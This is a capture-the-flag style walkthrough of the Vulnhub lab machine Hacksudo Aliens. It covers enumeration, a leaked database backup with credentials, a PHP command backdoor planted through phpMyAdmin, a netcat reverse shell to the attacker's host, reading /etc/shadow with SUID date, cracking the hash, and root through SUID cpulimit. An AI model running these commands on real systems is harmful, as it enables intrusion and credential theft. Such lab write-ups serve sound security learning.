Hacksudo Aliens Walkthrough – Vulnhub – Writeup

I am going to do a walkthrough of Hacksudo Aliens from Vulnhub by Vishal Waghmare. This is a beginner friendly machine and should be fun as previous hacksudo machines. Also, make sure to check my previous writeup.

Link to the machine: https://www.vulnhub.com/entry/hacksudo-aliens,676/

Walkthrough of hacksudo machines

Identify the target

As usual, I found the IP address of the target in the first place.

sudo netdiscover -i eth0 -r 10.0.2.0/24

The IP of my local machine is 10.0.2.15 whereas that of target is 10.0.2.26. Now, the next step is to scan for open ports.

Port scan

Now, I scanned the open ports to identify the exposed services. Also, I always like to store the results to some files.

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.26 -oN hacksudoaliens.nmap

Here, we have two http servers. So, I decided to look around both of the servers.

Enumerate web servers

One server contained a website for sightings of aliens whereas another server had phpmyadmin installed. Then, I decided to do directory enumeration.

gobuster dir -u http://10.0.2.26 -x php,txt,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o hacksudoaliens.gobuster

Here, found an interesting path which contained mysql backup file. Thus, I decided to download the file using wget.

wget http://10.0.2.26/backup/mysql.bak

Then, I looked up the type of the file using the command “file”.

file mysql.bak

The file is a shell script hence I decided to view the contents.

cat mysql.bak

Finally, we got the first set of credentials which were of mysql. Therefore, I could now login to the phpmyadmin on port 9000.

Injecting a backdoor

Now that we can execute SQL queries using phpmysql, I created a backdoor to the server.

Hence, I created a php file backdoor.php which takes a GET parameter ‘c’ where we can execute system commands. For example, we can check if the target has netcat or not.

Then, I tried to spawn reverse shell. So, I listened on the port 4444 of the local machine.

nc -nlvp 4444

And I changed the value of the parameter c as follows.

nc -e /bin/bash 10.0.2.15 4444

Getting user’s shell

After I got the reverse shell, I decided to improve the shell as follows.

python -c 'import pty;pty.spawn("/bin/bash")'
# Then did ctrl + z for sending the shell to background
stty raw -echo;fg
reset
# if it prompts for terminal, use xterm
stty cols 173 rows 43
export TERM=xterm

Then, I checked for any suid binaries.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

As we can see above, the binary date has an SUID permission and in this case, I could act as root. Hence, I could now read any files as root. So, my choice would be shadow file.

Reference: https://gtfobins.github.io/gtfobins/date/

date -f /etc/shadow

Finally, we got the hash of the user hacksudo. So, I copied the hash and pasted it in a file named “hash” in my local machine. Then, I used john the ripper and rockyou.txt to crack the password.

john hash --wordlist=/home/kali/rockyou.txt

Now, I could SSH as the use hacksudo and get the flag.

Privilege escalation to root

Once again, I looked for the SUID binaries.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

I found a suid binary in the Downloads directory which could lead us to the root shell.

Reference: https://gtfobins.github.io/gtfobins/cpulimit/#suid

./cpulimit -l 100 -f -- /bin/bash -p

Lastly, we got the root flag.

Conclusion

Hacksudo aliens machine is one of the great machines to learn for the beginners that are on vulnhub. Likewise, I hope this walkthrough has been as easy as the machine. So, check out my other writeups as well. This is all for Hacksudo Aliens Walkthrough – Vulnhub – Writeup.

Leave a comment